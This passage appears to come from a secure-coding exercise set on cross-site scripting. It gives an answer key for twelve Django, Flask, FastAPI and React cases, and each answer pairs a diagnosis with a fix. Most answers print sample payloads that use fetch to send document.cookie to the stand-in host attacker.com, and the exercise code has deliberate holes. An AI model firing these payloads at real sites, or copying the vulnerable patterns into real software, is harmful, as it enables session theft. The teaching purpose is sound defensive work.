<span class="nf">escape</span><span class="p">(</span><span class="n">body</span><span class="p">)</span> <span class="n">Comment</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">create</span><span class="p">(</span> <span class="n">user</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">user</span><span class="p">,</span> <span class="n">body</span><span class="o">=</span><span class="n">safe_body</span><span class="p">,</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="sh">'</span><span class="s">comment_list</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">comment_list</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">comments</span> <span class="o">=</span> <span class="n">Comment</span><span class="p">.</span><span class="n">query</span><span class="p">.</span><span class="nf">order_by</span><span class="p">(</span> <span class="n">Comment</span><span class="p">.</span><span class="n">created_at</span><span class="p">.</span><span class="nf">desc</span><span class="p">()</span> <span class="p">).</span><span class="nf">all</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">comments.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span> <span class="sh">'</span><span class="s">comments</span><span class="sh">'</span><span class="p">:</span> <span class="n">comments</span><span class="p">,</span> <span class="p">})</span> <span class="k">def</span> <span class="nf">comment_api</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">comments</span> <span class="o">=</span> <span class="n">Comment</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">all</span><span class="p">().</span><span class="nf">values</span><span class="p">(</span><span class="sh">'</span><span class="s">user__username</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">body</span><span class="sh">'</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">comments</span><span class="sh">'</span><span class="p">:</span> <span class="nf">list</span><span class="p">(</span><span class="n">comments</span><span class="p">)})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# comments.html #} {% for comment in comments %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"comment"</span><span class="nt">&gt;</span> <span class="nt">&lt;p&gt;</span>{{ comment.body }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} </code></pre> </div> <h1> Answer Key </h1> <h3> Case 1 — Answer </h3> <ol> <li><p>This is a Reflected XSS. The server can clearly see the payload in the query. Yet wraps it in the final HTTP Response.</p></li> <li><p>Sample request:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?q=&lt;script&gt;alert(1)&lt;/script&gt; </code></pre> </div> <ol> <li>Remove the <code>safe</code> filter. This will permit direct rendering and can introduce XSS vulnerabilities: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- results.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h2&gt;</span>Results for: {{ query }}<span class="nt">&lt;/h2&gt;</span> {% for result in results %} <span class="nt">&lt;p&gt;</span>{{ result.title }}<span class="nt">&lt;/p&gt;</span> {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 2 — Answer </h3> <ol> <li><p>This is a case of a Reflected XSS Attack. Although the developer makes the call for HTML Escape encoding using the <code>escape()</code> in the backend this is the wrong context escaping. We must escape javascript since user input is rendered inside a Javascript <code>&lt;script&gt;</code> element on the frontend.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?name="; fetch('https://attacker.com?q='+document.cookie);// </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">escape</span> <span class="k">def</span> <span class="nf">user_profile</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">profile.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="n">username</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- profile.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">currentUser</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">{{ username|escapejs }}</span><span class="dl">"</span><span class="p">;</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">Logged in as: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">currentUser</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;&lt;h1&gt;</span>Profile<span class="nt">&lt;/h1&gt;&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 3 — Answer </h3> <ol> <li><p>Stored XSS vulnerability. Misplaced escaping: Escaping must take place in the frontend template right before the <code>comment</code> is rendered.</p></li> <li><p>Sample of what <code>raw_comments</code> can store as payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">raw_comments:</span><span class="w"> </span><span class="p">[</span><span class="s2">"&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie)&lt;/script&gt;"</span><span class="p">]</span><span class="w"> </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="k">def</span> <span class="nf">comment_list</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">raw_comments</span> <span class="o">=</span> <span class="n">Comment</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">values_list</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="n">flat</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">comments.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">comments</span><span class="sh">"</span><span class="p">:</span> <span class="n">raw_comments</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- comments.html --&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for comment in comments %} <span class="nt">&lt;li&gt;</span>{{ comment }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> </code></pre> </div> <h3> Case 4 — Answer </h3> <ol> <li><p>Reflected XSS. Missing escaping. Bad habit to use <code>render_template_string()</code> since it allows an attacker to modify template. There is also a Server-Side Template Injection vulnerability since the <code>%s</code> string is substituted before <code>render_template_string()</code> parses the template. Even HTML escaping will not fix this.</p></li> <li><p>Reflected XSS sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?name=&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt; </code></pre> </div> <p>An attacker can also attempt a Server-Side Injection Template if the above payload fails (not shown here due to complexity).</p> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/greet</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">greet</span><span class="p">():</span> <span class="n">name</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">guest</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">greet.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="n">name</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- greet.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Hello, {{name}}!<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 5 — Answer </h3> <ol> <li><p>Reflected XSS Attack: The <code>safe</code> filter in <code>quote()</code> means the characters found in the string <code>"/:?=&amp;"</code> will not be URL-safe encoded! Wrong context escaping. Neither HTML escaping nor URL-safe encoding will work since the <code>href</code> attribute will reverse percent encoding. It's also a bad habit to use <code>render_template_string()</code>. The only way to fix this is to check if the URL is safe. An implementation to check if the URL is safe is given in the fix in (3.) below.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?to=javascript:fetch('https://attacker.com/?q='+document.cookie); </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">redirect</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlparse</span><span class="p">,</span> <span class="n">urljoin</span> <span class="kn">from</span> <span class="n">typing</span> <span class="kn">import</span> <span class="n">List</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="k">def</span> <span class="nf">is_safe_url</span><span class="p">(</span><span class="n">target</span><span class="p">):</span> <span class="n">ref_url</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">host_url</span><span class="p">)</span> <span class="n">test_url</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="nf">urljoin</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">host_url</span><span class="p">,</span> <span class="n">target</span><span class="p">))</span> <span class="k">return</span> <span class="n">test_url</span><span class="p">.</span><span class="n">scheme</span> <span class="ow">in</span> <span class="p">(</span><span class="sh">'</span><span class="s">http</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">https</span><span class="sh">'</span><span class="p">)</span> <span class="ow">and</span> \ <span class="n">ref_url</span><span class="p">.</span><span class="n">netloc</span> <span class="o">==</span> <span class="n">test_url</span><span class="p">.</span><span class="n">netloc</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/redirect-preview</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">redirect_preview</span><span class="p">():</span> <span class="n">destination</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">to</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/</span><span class="sh">"</span><span class="p">)</span> <span class="n">safe_dest</span> <span class="o">=</span> <span class="sh">""</span> <span class="k">if</span> <span class="nf">is_safe_url</span><span class="p">(</span><span class="n">destination</span><span class="p">):</span> <span class="n">safe_dest</span> <span class="o">=</span> <span class="n">destination</span> <span class="k">else</span><span class="p">:</span> <span class="n">safe_dest</span> <span class="o">=</span> <span class="sh">"</span><span class="s">/</span><span class="sh">"</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="n">safe_dest</span><span class="p">)</span> </code></pre> </div> <h3> Case 6 — Answer </h3> <ol> <li><p>No XSS vulnerability here but HTML double-escaping is not a good coding habit. There is no need to escape server-side since template HTML autoescapes.</p></li> <li><p>The original code snippet is not vulnerable to XSS. It just has styling issues.</p></li> <li><p>Fix:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/comment</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">comment</span><span class="p">():</span> <span class="n">user_comment</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">comment</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">comment.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">comment</span><span class="o">=</span><span class="n">user_comment</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/comment.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;p&gt;</span>Your comment: {{ comment }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 7 — Answer </h3> <ol> <li><p>Reflected XSS. No HTML escaping is applied.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?q=&lt;script&gt;fetch('https://attacker.com?q='+document.cookie);&lt;/script&gt; </code></pre> </div> <ol> <li>The <code>HTMLResponse</code> is replaced with <code>Jinja2Templates</code> because that supports HTML autoescaping with the <code>{{ }}</code> syntax: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/search</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">q</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">""</span><span class="p">):</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">search.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">q</span><span class="sh">"</span><span class="p">:</span> <span class="n">q</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- search.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h2&gt;</span>Results for: {{q}}<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 8 — Answer </h3> <ol> <li><p>DOM XSS. Missing escaping in the <code>fetch()</code> call in the frontend template. Replace <code>innerHTML</code> attribute with <code>textContent</code>. According to OWASP it is a bad habit to use <code>innerHTML</code>. One should replace that with <code>textContent</code> attribute instead. This will make it impossible for any Javascript to be rendered. No need for escaping.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?name=&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- index.html (served separately) --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"greeting"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">/api/username?name=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">name=</span><span class="dl">"</span><span class="p">)[</span><span class="mi">1</span><span class="p">])</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">r</span> <span class="o">=&gt;</span> <span class="nx">r</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">greeting</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Hello, </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">data</span><span class="p">.</span><span class="nx">username</span><span class="p">;</span> <span class="p">});</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 9 — Answer </h3> <ol> <li><p>Wrong context escaping. The developer applies HTML escaping. But the code is still vulnerable to DOM XSS. So the <code>innerHTML</code> attribute must be replaced with <code>textContent</code>.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?text=&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span> <span class="kn">from</span> <span class="n">fastapi.responses</span> <span class="kn">import</span> <span class="n">JSONResponse</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/api/comment</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_comment</span><span class="p">(</span><span class="n">text</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">""</span><span class="p">):</span> <span class="k">return</span> <span class="nc">JSONResponse</span><span class="p">(</span><span class="n">content</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">comment</span><span class="sh">"</span><span class="p">:</span> <span class="n">text</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// App.jsx (React frontend)</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">useEffect</span><span class="p">,</span> <span class="nx">useRef</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">react</span><span class="dl">"</span><span class="p">;</span> <span class="kd">function</span> <span class="nf">CommentBox</span><span class="p">({</span> <span class="nx">comment</span> <span class="p">})</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">ref</span> <span class="o">=</span> <span class="nf">useRef</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span> <span class="nf">useEffect</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">ref</span><span class="p">.</span><span class="nx">current</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">comment</span><span class="p">;</span> <span class="p">},</span> <span class="p">[</span><span class="nx">comment</span><span class="p">]);</span> <span class="k">return</span> <span class="o">&lt;</span><span class="nx">div</span> <span class="nx">ref</span><span class="o">=</span><span class="p">{</span><span class="nx">ref</span><span class="p">}</span> <span class="sr">/&gt;</span><span class="err">; </span><span class="p">}</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">loadComment</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">params</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">/api/comment?text=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">text</span><span class="dl">"</span><span class="p">));</span> <span class="kd">const</span> <span class="nx">data</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="k">return</span> <span class="o">&lt;</span><span class="nx">CommentBox</span> <span class="nx">comment</span><span class="o">=</span><span class="p">{</span><span class="nx">data</span><span class="p">.</span><span class="nx">comment</span><span class="p">}</span> <span class="sr">/&gt;</span><span class="err">; </span><span class="p">}</span> </code></pre> </div> <h3> Case 10 — Answer </h3> <ol> <li><p>Missing Escaping for DOM XSS vulnerability.</p></li> <li><p>Payload for sink <code>username</code>:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?username=&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt; </code></pre> </div> <p>Payload for sink <code>bio</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?bio=&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- index.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"username-display"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"bio-display"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">params</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">username</span> <span class="o">=</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">username</span><span class="dl">"</span><span class="p">)</span> <span class="o">||</span> <span class="dl">"</span><span class="s2">guest</span><span class="dl">"</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">bio</span> <span class="o">=</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">bio</span><span class="dl">"</span><span class="p">)</span> <span class="o">||</span> <span class="dl">""</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">username-display</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">User: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">username</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">bio-display</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Bio: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">bio</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 11 — Answer </h3> <ol> <li><p>DOM XSS. Missing escaping.</p></li> <li><p>Payload for sink <code>review</code>:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?review=&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// hooks/useRichText.js</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">useEffect</span><span class="p">,</span> <span class="nx">useRef</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">react</span><span class="dl">"</span><span class="p">;</span> <span class="k">export</span> <span class="kd">function</span> <span class="nf">useRichText</span><span class="p">(</span><span class="nx">content</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">ref</span> <span class="o">=</span> <span class="nf">useRef</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span> <span class="nf">useEffect</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">ref</span><span class="p">.</span><span class="nx">current</span><span class="p">)</span> <span class="p">{</span> <span class="nx">ref</span><span class="p">.</span><span class="nx">current</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">content</span><span class="p">;</span> <span class="p">}</span> <span class="p">},</span> <span class="p">[</span><span class="nx">content</span><span class="p">]);</span> <span class="k">return</span> <span class="nx">ref</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// App.jsx</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">useRichText</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">./hooks/useRichText</span><span class="dl">"</span><span class="p">;</span> <span class="kd">function</span> <span class="nf">ReviewCard</span><span class="p">({</span> <span class="nx">reviewText</span> <span class="p">})</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">ref</span> <span class="o">=</span> <span class="nf">useRichText</span><span class="p">(</span><span class="nx">reviewText</span><span class="p">);</span> <span class="k">return</span> <span class="o">&lt;</span><span class="nx">div</span> <span class="nx">className</span><span class="o">=</span><span class="dl">"</span><span class="s2">review</span><span class="dl">"</span> <span class="nx">ref</span><span class="o">=</span><span class="p">{</span><span class="nx">ref</span><span class="p">}</span> <span class="sr">/&gt;</span><span class="err">; </span><span class="p">}</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">loadReview</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">params</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">reviewText</span> <span class="o">=</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">review</span><span class="dl">"</span><span class="p">)</span> <span class="o">||</span> <span class="dl">""</span><span class="p">;</span> <span class="k">return</span> <span class="o">&lt;</span><span class="nx">ReviewCard</span> <span class="nx">reviewText</span><span class="o">=</span><span class="p">{</span><span class="nx">reviewText</span><span class="p">}</span> <span class="sr">/&gt;</span><span class="err">; </span><span class="p">}</span> </code></pre> </div> <h3> Case 12 — Answer </h3> <ol> <li><p>DOM XSS. Wrong context escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?q=&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- index.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"search-banner"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">renderBanner</span><span class="p">(</span><span class="nx">container</span><span class="p">,</span> <span class="nx">label</span><span class="p">,</span> <span class="nx">value</span><span class="p">)</span> 